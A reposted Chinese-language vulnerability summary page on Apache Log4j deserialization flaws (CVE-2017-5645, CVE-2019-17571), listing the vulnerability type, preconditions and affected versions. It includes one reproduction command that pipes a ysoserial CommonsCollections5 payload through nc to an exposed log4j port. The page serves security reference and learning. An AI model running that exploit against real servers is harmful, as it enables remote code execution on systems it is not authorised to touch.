应用安全 - 工具 | 框架 - Apache - Apache Log4j - 漏洞 - 汇总

本文转载自查看原文 2019-12-26 17:14 686

Date 2017 类型 Java反序列化导致远程代码执行

前置条件
log4j对应的端口对外开放

影响范围 

复现
java -jar ysoserial.jar CommonsCollections5 "touch /tmp/CVE-2017-5645_is_success" | nc your-ip 4712 
分析

CVE-2019-17571

Date 2019 类型 Java反序列化导致远程代码执行

前置条件
log4j对应的端口对外开放 影响范围
1.2.4 <= Apache Log4j <= 1.2.17 复现 分析

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 Apache Log4j 2 报高危漏洞，CODING 联手腾讯安全护卫软件安全【漏洞复现】Apache Log4j 2远程代码执行漏洞修复Apache Log4j任意代码执行漏洞安全风险通告 Apache Log4j 爆核弹级漏洞，Spring Boot 默认日志框架就能完美躲过！！严重的 Apache Log4j 漏洞威胁到企业应用程序 Apache Log4j 任意代码执行漏洞 Apache Log4j 2远程代码执行漏洞修复 Apache Log4j 远程代码执行漏洞 Apache Log4j 远程代码执行漏洞 springBoot修复使用 log4j 2.15.0 Apache Log4j任意代码执行漏洞修复 spring-boot-starter-log4j2